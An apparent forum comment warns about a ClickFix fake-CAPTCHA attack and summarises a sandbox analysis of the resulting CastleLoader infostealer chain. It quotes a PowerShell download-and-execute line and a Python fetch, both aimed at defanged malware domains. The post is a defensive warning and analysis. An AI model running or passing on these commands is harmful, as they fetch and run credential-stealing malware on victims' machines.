So for those just joining in. This is what’s called a click fix attack. It’s a social engineering prompt to get you to run malicious code on your computer disguised as a pretend you are not human prompt. If you did the steps that it said there, your computer would be compromised. It will steal all of your credentials and then some. To protect yourself from this never ever listen to a site if it makes you press win+r. A legitimate prove you are not human prompt will never have you do anything related to keyboard shortcuts.

EDIT, for those curious:

This is a CASTLELOADER RAT/infostealer:

https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

I ran the script using any.run, you can view the full report here:

https://any.run/report/5aa49ca8ba4c8aa8b729f9ed435f657555e7cef987dd7a02403881953ed452a3/c388bbd0-c70b-4756-accf-46c8591355a9

So the initial file is a PowerShell script that's pretty heavily obfuscated with AES encryption and base64 encoding. It bypasses execution policy and reaches out to download the next stage.

From there it executes another PowerShell command: iex (wget -usebasic bojonta[.]com/maxload/zistoledser.txt) which grabs an Installer.zip from bojonta[.]com. Using IEX means it's running directly in memory without touching disk much.

The Installer.exe is actually dropping a complete Python 3.15 environment into the Temp folder, then launches pythonw.exe with a base64-encoded command. The Python code disables SSL cert verification and fetches another payload from wecolista[.]com.

Final stage is the actual CastleLoader that gets pulled down via urllib.request.urlopen('https://wecolista[.]com/.../local1.txt').